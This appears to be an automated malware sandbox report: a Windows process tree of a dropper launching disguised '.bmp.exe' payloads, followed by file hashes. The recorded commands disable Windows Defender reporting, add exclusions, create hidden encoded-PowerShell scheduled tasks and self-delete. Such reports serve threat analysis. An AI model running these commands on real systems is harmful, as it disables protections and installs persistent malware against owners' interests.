C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\W3XCasyiOsB1YaWe9s9vplGV.exe"C:\Users\Admin\Documents\W3XCasyiOsB1YaWe9s9vplGV.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 4245⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 6965⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 7165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 7165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 6965⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 9645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 9885⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 13445⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe"C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe"4⤵
-
C:\Windows\SysWOW64\TapiUnattend.exeTapiUnattend5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Suo.ppam & ping -n 5 localhost5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"7⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mIKZUERRcdogxRWVUqrYiUvVLTbpecknKxaeazHqEtakMEgUAbPEdtHFkPhwiIPZyJEZnUCBarxeClouFCIFGHoFMNQDyGTVfaueqgcGVhkhKFrqGivEZpabBYhLrYvMlnNptyu$" Avvelenate.ppam7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Disconosci.exe.pifDisconosci.exe.pif r7⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"4⤵
-
C:\Windows\system32\cmd.exe/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'6⤵
-
C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 3045⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SPL1H.tmp\B2BCH2.exe.tmp"C:\Users\Admin\AppData\Local\Temp\is-SPL1H.tmp\B2BCH2.exe.tmp" /SL5="$603C0,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D5QLP.tmp\djkdj778_______.exe"C:\Users\Admin\AppData\Local\Temp\is-D5QLP.tmp\djkdj778_______.exe" /S /UID=916⤵
-
C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"2⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",4⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq3⤵
-
C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXEC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
-
C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 8523⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 2163⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 7003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 7403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 7403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 8083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 9563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 9923⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 13363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 13523⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mixruzki1.bmp.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 3043⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\08GEB05163E27DH.exe
-
C:\Users\Admin\AppData\Local\Temp\5L9I4748C6FJ8DM.exe
-
C:\Users\Admin\AppData\Local\Temp\C2I51M1BF7974J1.exe
-
C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed186a2b91bd4e9.exeWed186a2b91bd4e9.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed1811682666.exeWed1811682666.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18be8c3224a5.exeWed18be8c3224a5.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18be8c3224a5.exe"C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18be8c3224a5.exe" -u2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4052 -ip 40521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4976 -ip 49761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4976 -ip 49761⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3952 -ip 39521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4976 -ip 49761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4976 -ip 49761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4976 -ip 49761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4976 -ip 49761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4976 -ip 49761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4976 -ip 49761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4976 -ip 49761⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4312 -ip 43121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4728 -ip 47281⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 6083⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 6002⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6860 -ip 68601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6932 -ip 69321⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\TapiUnattend.exeTapiUnattend1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Camminato.xla & ping -n 5 localhost1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla3⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Plasmare.exe.pifPlasmare.exe.pif J3⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 53⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost2⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",2⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSA587.tmp\Install.exe.\Install.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSB6AD.tmp\Install.exe.\Install.exe /S /site_id "525403"2⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&4⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDYHLsNNE" /SC once /ST 05:35:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDYHLsNNE"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDYHLsNNE"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKqtUhAckstRmOkXqo" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GDRPYdOHWOMIRVQbw\bnDAWlqtvsqsVUM\bPmBaKN.exe\" hO /site_id 525403 /S" /V1 /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2740 -ip 27401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7048 -ip 70481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2740 -ip 27401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4728 -ip 47281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5080 -ip 50801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2740 -ip 27401⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&1⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:322⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2740 -ip 27401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2740 -ip 27401⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1028 -ip 10281⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2740 -ip 27401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5000 -ip 50001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2740 -ip 27401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6768 -ip 67681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2740 -ip 27401⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed189277fa467071b4.exe.logFilesize
700B
MD5e5352797047ad2c91b83e933b24fbc4f
SHA19bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed18e6324bbde126d.exe.logFilesize
700B
MD5e5352797047ad2c91b83e933b24fbc4f
SHA19bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed180cd523402090.exeFilesize
440KB
MD52bd7d11dc73e3c5bbfb3add3d93a6dde
SHA1a749f28e2ffa6ce7460b5667e985da1e1b70577d
SHA25683355f029bb92ff7d228d10da40d4b64f1b8158367ac9dc15235e8eec1d2cbd1
SHA512d7968c1a1073eb94ebf2cf6202a8ee7c8dc0e38a1f6b53e3bb76dfd4fc8c711d18cc7409a3f0d048010f9aefb8643a663c4d4e3d9da6e7cda558addd38fcee0a
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed180cd523402090.exeFilesize
440KB
MD52bd7d11dc73e3c5bbfb3add3d93a6dde
SHA1a749f28e2ffa6ce7460b5667e985da1e1b70577d
SHA25683355f029bb92ff7d228d10da40d4b64f1b8158367ac9dc15235e8eec1d2cbd1
SHA512d7968c1a1073eb94ebf2cf6202a8ee7c8dc0e38a1f6b53e3bb76dfd4fc8c711d18cc7409a3f0d048010f9aefb8643a663c4d4e3d9da6e7cda558addd38fcee0a
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed1811682666.exeFilesize
8KB
MD51f38e3cc77b4b92b02a80d59e270ef02
SHA11dd620ee23dc336abb16399d6615d321a96987c9
SHA256415355aba3b3f4a5149f983a45698c2a94a223360a3d5659e90fb8861a8f72b1
SHA51207e5e5f2a487434d7af0e96ca09de01966da5727214ab24fd6b40d0bf815e389ff611a76c078b1f798deabc0a2b05dd5118d81b77215357e6e5cc87aee29e121
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed1811682666.exeFilesize
8KB
MD51f38e3cc77b4b92b02a80d59e270ef02
SHA11dd620ee23dc336abb16399d6615d321a96987c9
SHA256415355aba3b3f4a5149f983a45698c2a94a223360a3d5659e90fb8861a8f72b1
SHA51207e5e5f2a487434d7af0e96ca09de01966da5727214ab24fd6b40d0bf815e389ff611a76c078b1f798deabc0a2b05dd5118d81b77215357e6e5cc87aee29e121
-
